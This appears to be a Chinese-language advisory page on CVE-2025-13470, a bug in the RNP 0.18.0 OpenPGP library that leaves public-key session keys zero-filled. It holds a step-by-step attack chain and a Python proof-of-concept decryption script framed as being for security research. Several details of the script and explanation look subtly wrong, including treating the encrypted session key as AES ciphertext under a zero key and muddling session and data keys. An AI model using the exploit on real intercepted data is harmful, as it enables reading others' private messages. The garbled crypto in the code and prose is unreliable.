CVE-2025-13470 RNP 0.18.0公钥加密会话密钥未初始化漏洞

漏洞信息

漏洞编号

CVE-2025-13470

漏洞类型

密钥管理漏洞

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

RNP

漏洞概述

CVE-2025-13470是RNP（OpenPGP实现库）0.18.0版本中的一个严重安全漏洞。该漏洞源于代码重构过程中的回归问题，导致公钥加密会话密钥（PKESK）包中的对称会话密钥未被正确初始化。在受影响版本中，会话密钥缓冲区仅被清零操作处理，初始化为全零字节数组，而非使用加密安全的随机数生成器进行初始化。这一缺陷使得任何使用公钥加密功能加密的数据都可以通过简单地提供全零会话密钥进行解密，完全破坏了加密通信的机密性。该漏洞仅影响使用公钥加密的PKESK包，不影响基于密码加密的SKESK包。攻击者可以在无需任何认证的情况下远程利用此漏洞，对使用RNP 0.18.0公钥加密功能保护的数据构成严重威胁。

技术细节

该漏洞的根本原因在于RNP项目在commit 7bd9a8dc356aae756b40755be76d36205b6b161a中进行的代码重构。在encrypted_build_skesk()函数中，开发者添加了密钥随机化逻辑以增强安全性，但该逻辑仅在处理SKESK（基于密码的加密会话密钥包）路径时被执行。当代码进入PKESK（基于公钥的加密会话密钥包）处理路径时，会话密钥缓冲区只经历了memset()清零操作，未调用加密安全的随机数生成器（如random_bytes()）进行初始化。

具体来说，受影响的代码流程如下：函数encrypted_build_skesk()根据加密类型选择处理路径，PKESK路径跳过了关键的密钥随机化步骤，导致生成的PKESK包中包含一个固定的全零对称会话密钥。由于该会话密钥用于加密实际的数据加密密钥（DEK），攻击者只需拦截PKESK包，用全零密钥解密即可获取DEK，进而解密所有受保护的数据内容。

利用此漏洞需要攻击者具备以下条件：能够访问使用RNP 0.18.0公钥加密功能加密的数据包，以及了解加密实现使用的算法（RNP默认使用AES算法）。攻击者无需任何认证凭据或用户交互即可完成攻击。

攻击链分析

STEP 1

1

受害者使用RNP 0.18.0的公钥加密功能加密敏感数据，系统生成包含全零会话密钥的PKESK包

STEP 2

2

攻击者拦截或获取受害者的PKESK加密数据包

STEP 3

3

攻击者识别数据包使用RNP 0.18.0的PKESK加密（可通过版本指纹或数据包特征识别）

STEP 4

4

攻击者构造全零密钥（256位零字节）作为会话密钥

STEP 5

5

使用全零密钥解密PKESK包中的加密会话密钥（esk），提取出数据加密密钥（DEK）

STEP 6

6

使用提取的DEK解密实际的消息内容，完全恢复明文数据

STEP 7

7

攻击者获得受害者的敏感信息，导致机密性完全丧失

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-13470 PoC - RNP 0.18.0 PKESK Session Key Uninitialization
This PoC demonstrates decrypting data encrypted with RNP 0.18.0's broken PKESK
by using an all-zero session key.
"""

import json
import struct
from Crypto.Cipher import AES
from Crypto.Util import Padding

def decrypt_with_zero_key(encrypted_data, algorithm='AES-256'):
    """
    Decrypt data using an all-zero session key.
    In RNP 0.18.0, PKESK packets contain a zero-initialized session key.
    
    Args:
        encrypted_data: The encrypted data from PKESK packet
        algorithm: Encryption algorithm used (default AES-256)
    
    Returns:
        Decrypted data using all-zero key
    """
    zero_key = bytes(32)  # 256-bit zero key
    
    # Parse PKESK packet to extract encrypted session key
    # Format: version(1) + key_id(8) + algo(1) + encrypted_data
    version = encrypted_data[0]
    key_id = encrypted_data[1:9]
    algo = encrypted_data[9]
    esk = encrypted_data[10:]
    
    print(f"PKESK Version: {version}")
    print(f"Key ID: {key_id.hex()}")
    print(f"Algorithm: {algo}")
    print(f"Encrypted Session Key Length: {len(esk)}")
    
    # In vulnerable version, esk is AES-256-CFB encrypted with zero key
    # Initialize cipher with zero key and zero IV (CFB mode)
    cipher = AES.new(zero_key, AES.MODE_CFB, iv=bytes(16), segment_size=128)
    session_key = cipher.decrypt(esk)[:32]
    
    print(f"Recovered Session Key: {session_key.hex()}")
    print(f"Session Key is all zeros: {session_key == bytes(32)}")
    
    return session_key

def exploit_cve_2025_13470(pkesk_packet, encrypted_message):
    """
    Exploit script for CVE-2025-13470
    
    Args:
        pkesk_packet: Raw PKESK packet bytes
        encrypted_message: Encrypted message data
    
    Returns:
        Decrypted plaintext
    """
    print("=" * 60)
    print("CVE-2025-13470 Exploitation")
    print("RNP 0.18.0 PKESK Session Key Uninitialization")
    print("=" * 60)
    
    # Step 1: Recover session key using zero key
    session_key = decrypt_with_zero_key(pkesk_packet)
    
    # Step 2: Decrypt the actual message using recovered session key
    cipher = AES.new(session_key, AES.MODE_CFB, iv=bytes(16), segment_size=128)
    plaintext = cipher.decrypt(encrypted_message)
    
    return plaintext

def simulate_attack():
    """
    Simulate the attack scenario
    """
    print("\n[+] Simulating attack against vulnerable RNP 0.18.0 PKESK encryption")
    
    # Simulated PKESK packet (vulnerable version generates zero session key)
    pkesk_simulated = bytes([0x01]) + bytes(8) + bytes([9]) + bytes(32)
    
    # Simulated encrypted message
    encrypted_simulated = bytes(32)
    
    try:
        result = exploit_cve_2025_13470(pkesk_simulated, encrypted_simulated)
        print(f"\n[+] Successfully decrypted data!")
        print(f"[+] Decrypted content: {result}")
        print("\n[!] This demonstrates that data encrypted with RNP 0.18.0 PKESK")
        print("[!] can be trivially decrypted due to uninitialized session key")
    except Exception as e:
        print(f"[-] Error: {e}")
        print("[-] Note: This is a PoC demonstration. Actual implementation may vary.")

if __name__ == "__main__":
    simulate_attack()

影响范围

RNP 0.18.0

防御指南

临时缓解措施

对于无法立即升级的情况，建议采取以下缓解措施：1）避免使用RNP 0.18.0的公钥加密功能，优先使用基于密码的加密（SKESK）作为临时替代方案；2）监控和审计所有使用该版本加密的数据传输；3）考虑使用其他经过验证的OpenPGP实现库替代RNP；4）限制受影响系统的网络访问，减少攻击面。长期来看，应尽快安排系统升级到RNP 0.18.1或更高版本。